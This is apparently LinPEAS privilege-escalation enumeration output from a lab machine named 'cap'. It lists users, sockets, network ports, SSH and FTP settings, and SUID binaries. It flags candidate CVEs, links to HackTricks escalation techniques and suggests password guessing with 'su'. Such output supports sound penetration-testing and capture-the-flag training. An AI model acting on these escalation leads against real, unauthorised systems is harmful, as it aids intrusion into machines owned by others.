/snap/core18/2074/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core18/2074/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/snap/core18/2074/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/2074/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/2074/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/org/kernel/linux/storage/multipathd
/run/dbus/system_bus_socket
└─(Read Write)
/run/irqbalance//irqbalance1031.sock
└─(Read )
/run/irqbalance/irqbalance1031.sock
└─(Read )
/run/lvm/lvmpolld.socket
/run/snapd-snap.socket
└─(Read Write)
/run/snapd.socket
└─(Read Write)
/run/systemd/journal/dev-log
└─(Read Write)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
└─(Read Write)
/run/systemd/journal/stdout
└─(Read Write)
/run/systemd/journal/syslog
└─(Read Write)
/run/systemd/notify
└─(Read Write)
/run/systemd/private
└─(Read Write)
/run/systemd/userdb/io.systemd.DynamicUser
└─(Read Write)
/run/udev/control
/run/user/1001/bus
└─(Read Write)
/run/user/1001/gnupg/S.dirmngr
└─(Read Write)
/run/user/1001/gnupg/S.gpg-agent
└─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.browser
└─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.extra
└─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.ssh
└─(Read Write)
/run/user/1001/pk-debconf-socket
└─(Read Write)
/run/user/1001/snapd-session-agent.socket
└─(Read Write)
/run/user/1001/systemd/notify
└─(Read Write)
/run/user/1001/systemd/private
└─(Read Write)
/run/uuidd/request
└─(Read Write)
/run/vmware/guestServicePipe
└─(Read Write)
/var/run/vmware/guestServicePipe
└─(Read Write)
/var/snap/lxd/common/lxd/unix.socket
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf ( <policy group="power">)
╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 - - - - - - -
:1.1 - - - - - - -
:1.15 - - - - - - -
:1.2 - - - - - - -
:1.21 - - - - - - -
:1.4 - - - - - - -
:1.5 - - - - - - -
:1.6 - - - - - - -
:1.7 - - - - - - -
:1.8 - - - - - - -
com.ubuntu.LanguageSelector - - - (activatable) - - -
com.ubuntu.SoftwareProperties - - - (activatable) - - -
org.freedesktop.Accounts - - - - - - -
org.freedesktop.DBus - - - - - - -
org.freedesktop.PackageKit - - - (activatable) - - -
org.freedesktop.PolicyKit1 - - - - - - -
org.freedesktop.UPower - - - (activatable) - - -
org.freedesktop.bolt - - - (activatable) - - -
org.freedesktop.fwupd - - - (activatable) - - -
org.freedesktop.hostname1 - - - (activatable) - - -
org.freedesktop.locale1 - - - (activatable) - - -
org.freedesktop.login1 - - - - - - -
org.freedesktop.network1 - - - - - - -
org.freedesktop.resolve1 - - - - - - -
org.freedesktop.systemd1 - - - - - - -
org.freedesktop.thermald - - - (activatable) - - -
org.freedesktop.timedate1 - - - (activatable) - - -
org.freedesktop.timesync1 - - - - - - -
╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
cap
127.0.0.1 localhost
127.0.0.1 cap
nameserver 127.0.0.53
options edns0 trust-ad
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.19.17 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 dead:beef::250:56ff:feb9:6015 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:6015 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:60:15 txqueuelen 1000 (Ethernet)
RX packets 14102 bytes 2212760 (2.2 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9829 bytes 2117427 (2.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 11558 bytes 909491 (909.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11558 bytes 909491 (909.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
╔══════════╣ Can I sniff with tcpdump?
No
╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)
╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Sorry, try again.
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)
╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
nathan:x:1001:1001::/home/nathan:/bin/bash
root:x:0:0:root:/root:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(tss) gid=111(tss) groups=111(tss)
uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)
uid=109(landscape) gid=115(landscape) groups=115(landscape)
uid=110(pollinate) gid=1(daemon) groups=1(daemon)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=112(ftp) gid=118(ftp) groups=118(ftp)
uid=113(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=998(lxd) gid=100(users) groups=100(users)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
╔══════════╣ Login now
05:08:27 up 2:52, 1 user, load average: 0.17, 0.07, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
╔══════════╣ Last logons
root pts/0 Fri May 21 14:32:11 2021 - down (00:01) 10.10.14.7
root tty1 Fri May 21 14:31:21 2021 - down (00:02) 0.0.0.0
reboot system boot Fri May 21 14:30:50 2021 - Fri May 21 14:33:53 2021 (00:03) 0.0.0.0
root tty1 Fri May 21 13:43:26 2021 - down (00:47) 0.0.0.0
reboot system boot Fri May 21 13:40:52 2021 - Fri May 21 14:30:42 2021 (00:49) 0.0.0.0
root tty1 Sat May 15 21:41:23 2021 - down (00:01) 0.0.0.0
lab tty1 Sat May 15 21:40:56 2021 - Sat May 15 21:41:11 2021 (00:00) 0.0.0.0
reboot system boot Sat May 15 21:40:45 2021 - Sat May 15 21:42:37 2021 (00:01) 0.0.0.0
wtmp begins Sat May 15 21:40:29 2021
╔══════════╣ Last time logon each user
Username Port From Latest
root tty1 Fri Jul 23 13:29:13 +0000 2021
nathan pts/0 10.10.17.182 Tue Apr 7 04:53:04 +0000 2026
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/snap/bin/lxc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
ii g++ 4:9.3.0-1ubuntu2 amd64 GNU C++ compiler
ii g++-9 9.3.0-17ubuntu1~20.04 amd64 GNU C++ compiler
ii gcc 4:9.3.0-1ubuntu2 amd64 GNU C compiler
ii gcc-9 9.3.0-17ubuntu1~20.04 amd64 GNU C compiler
/usr/bin/gcc
/usr/bin/g++
╔══════════╣ Searching mysql credentials and exec
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Oct 15 2019 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 May 23 2021 /etc/ldap
drwxr-xr-x 2 root root 32 May 7 2021 /snap/core18/2066/etc/ldap
drwxr-xr-x 2 root root 32 Jun 11 2021 /snap/core18/2074/etc/ldap
╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)
-rw-r--r-- 1 root root 598 Sep 23 2020 /etc/ssh/ssh_host_dsa_key.pub
-rw-r--r-- 1 root root 170 Sep 23 2020 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 90 Sep 23 2020 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 562 Sep 23 2020 /etc/ssh/ssh_host_rsa_key.pub
PermitRootLogin yes
ChallengeResponseAuthentication no
UsePAM yes
PasswordAuthentication yes
══╣ Some certificates were found (out limited):
/etc/pki/fwupd-metadata/LVFS-CA.pem
/etc/pki/fwupd/LVFS-CA.pem
/etc/pollinate/entropy.ubuntu.com.pem
/etc/ssl/certs/ACCVRAIZ1.pem
/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/CA_Disig_Root_R2.pem
6584PSTORAGE_CERTSBIN
══╣ Writable ssh and gpg agents
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket
/etc/systemd/user/sockets.target.wants/gpg-agent.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 May 31 2021 /etc/pam.d
-rw-r--r-- 1 root root 2133 May 29 2020 /etc/pam.d/sshd
account required pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so close
session required pam_loginuid.so
session optional pam_keyinit.so force revoke
session optional pam_motd.so motd=/run/motd.dynamic
session optional pam_motd.so noupdate
session optional pam_mail.so standard noenv # [1]
session required pam_limits.so
session required pam_env.so # [1]
session required pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so open
╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions
tmux 3.0a
/tmp/tmux-1001
╔══════════╣ Analyzing Cloud Init Files (limit 70)
-rw-r--r-- 1 root root 3559 Apr 19 2021 /snap/core18/2066/etc/cloud/cloud.cfg
lock_passwd: True
-rw-r--r-- 1 root root 3559 May 11 2021 /snap/core18/2074/etc/cloud/cloud.cfg
lock_passwd: True
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 200 May 7 2021 /snap/core18/2066/usr/share/keyrings
drwxr-xr-x 2 root root 200 Jun 11 2021 /snap/core18/2074/usr/share/keyrings
drwxr-xr-x 2 root root 4096 May 23 2021 /usr/share/keyrings
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /snap/core18/2066/etc/pam.d/passwd
passwd file: /snap/core18/2066/etc/passwd
passwd file: /snap/core18/2066/usr/share/bash-completion/completions/passwd
passwd file: /snap/core18/2066/usr/share/lintian/overrides/passwd
passwd file: /snap/core18/2066/var/lib/extrausers/passwd
passwd file: /snap/core18/2074/etc/pam.d/passwd
passwd file: /snap/core18/2074/etc/passwd
passwd file: /snap/core18/2074/usr/share/bash-completion/completions/passwd
passwd file: /snap/core18/2074/usr/share/lintian/overrides/passwd
passwd file: /snap/core18/2074/var/lib/extrausers/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 2796 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 7399 Sep 17 2018 /snap/core18/2066/usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /snap/core18/2066/usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /snap/core18/2066/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /snap/core18/2066/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /snap/core18/2066/usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 7399 Sep 17 2018 /snap/core18/2074/usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /snap/core18/2074/usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /snap/core18/2074/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /snap/core18/2074/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /snap/core18/2074/usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 3267 Jan 6 2021 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 2274 May 11 2021 /usr/share/keyrings/ubuntu-advantage-cis.gpg
-rw-r--r-- 1 root root 2236 May 11 2021 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg
-rw-r--r-- 1 root root 2264 May 11 2021 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg
-rw-r--r-- 1 root root 2275 May 11 2021 /usr/share/keyrings/ubuntu-advantage-fips.gpg
-rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 13 2020 /usr/share/popularity-contest/debian-popcon.gpg
╔══════════╣ Analyzing Cache Vi Files (limit 70)
lrwxrwxrwx 1 root root 9 May 27 2021 /home/nathan/.viminfo -> /dev/null
╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 675 Apr 2 2018 /snap/core18/2066/usr/share/bash-completion/completions/postfix
-rw-r--r-- 1 root root 675 Apr 2 2018 /snap/core18/2074/usr/share/bash-completion/completions/postfix
-rw-r--r-- 1 root root 813 Feb 2 2020 /usr/share/bash-completion/completions/postfix
╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 5850 Mar 6 2019 /etc/vsftpd.conf
anonymous_enable
local_enable=YES
#write_enable=YES
#anon_upload_enable=YES
#anon_mkdir_write_enable=YES
#chown_uploads=YES
#chown_username=whoever
-rw-r--r-- 1 root root 41 Jun 18 2015 /usr/lib/tmpfiles.d/vsftpd.conf
-rw-r--r-- 1 root root 506 Mar 6 2019 /usr/share/doc/vsftpd/examples/INTERNET_SITE/vsftpd.conf
anonymous_enable
local_enable
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 564 Mar 6 2019 /usr/share/doc/vsftpd/examples/INTERNET_SITE_NOINETD/vsftpd.conf
anonymous_enable
local_enable
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 260 Feb 2 2008 /usr/share/doc/vsftpd/examples/VIRTUAL_USERS/vsftpd.conf
anonymous_enable
local_enable=YES
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
╔══════════╣ Analyzing DNS Files (limit 70)
-rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind
╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Feb 25 2020 /etc/skel/.bashrc
-rw-r--r-- 1 nathan nathan 3771 Feb 25 2020 /home/nathan/.bashrc
-rw-r--r-- 1 root root 3771 Apr 4 2018 /snap/core18/2066/etc/skel/.bashrc
-rw-r--r-- 1 root root 3771 Apr 4 2018 /snap/core18/2074/etc/skel/.bashrc
-rw-r--r-- 1 root root 807 Feb 25 2020 /etc/skel/.profile
-rw-r--r-- 1 nathan nathan 807 Feb 25 2020 /home/nathan/.profile
-rw-r--r-- 1 root root 807 Apr 4 2018 /snap/core18/2066/etc/skel/.profile
-rw-r--r-- 1 root root 807 Apr 4 2018 /snap/core18/2074/etc/skel/.profile
100 833k 100 833k 0 0 13256 0 0:01:04 0:01:04 --:--:-- 10773
╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 39K Jul 21 2020 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K May 28 2020 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 31K Aug 16 2019 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 55K Jul 21 2020 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 87K May 28 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 67K May 28 2020 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 84K May 28 2020 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 52K May 28 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 67K Jul 21 2020 /usr/bin/su
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 23K Aug 16 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 128K Feb 2 2021 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 463K Mar 9 2021 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 51K Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 109K Apr 24 2021 /snap/snapd/11841/usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 109K Jun 15 2021 /snap/snapd/12398/usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 43K Sep 16 2020 /snap/core18/2066/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/2066/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/2066/bin/su
-rwsr-xr-x 1 root root 27K Sep 16 2020 /snap/core18/2066/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/2066/usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/2066/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/2066/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22 2019 /snap/core18/2066/usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22 2019 /snap/core18/2066/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 19 2021 /snap/core18/2066/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-resolve 42K Jun 11 2020 /snap/core18/2066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar 4 2019 /snap/core18/2066/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43K Sep 16 2020 /snap/core18/2074/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/2074/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/2074/bin/su
-rwsr-xr-x 1 root root 27K Sep 16 2020 /snap/core18/2074/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/2074/usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/2074/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/2074/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22 2019 /snap/core18/2074/usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22 2019 /snap/core18/2074/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 19 2021 /snap/core18/2074/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-resolve 42K Jun 11 2020 /snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar 4 2019 /snap/core18/2074/usr/lib/openssh/ssh-keysign
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 83K May 28 2020 /usr/bin/chage
-rwxr-sr-x 1 root tty 15K Mar 30 2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 43K Feb 13 2020 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 31K May 28 2020 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root ssh 343K Mar 9 2021 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 35K Jul 21 2020 /usr/bin/wall
-rwxr-sr-x 1 root utmp 15K Sep 30 2019 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 43K Apr 8 2021 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 43K Apr 8 2021 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Jul 21 2020 /snap/core18/2066/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Jul 21 2020 /snap/core18/2066/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71K Mar 22 2019 /snap/core18/2066/usr/bin/chage
-rwxr-sr-x 1 root shadow 23K Mar 22 2019 /snap/core18/2066/usr/bin/expiry
-rwxr-sr-x 1 root crontab 355K Mar 4 2019 /snap/core18/2066/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 31K Sep 16 2020 /snap/core18/2066/usr/bin/wall
-rwxr-sr-x 1 root shadow 34K Apr 8 2021 /snap/core18/2074/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Apr 8 2021 /snap/core18/2074/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71K Mar 22 2019 /snap/core18/2074/usr/bin/chage
-rwxr-sr-x 1 root shadow 23K Mar 22 2019 /snap/core18/2074/usr/bin/expiry
-rwxr-sr-x 1 root crontab 355K Mar 4 2019 /snap/core18/2074/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 31K Sep 16 2020 /snap/core18/2074/usr/bin/wall
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so
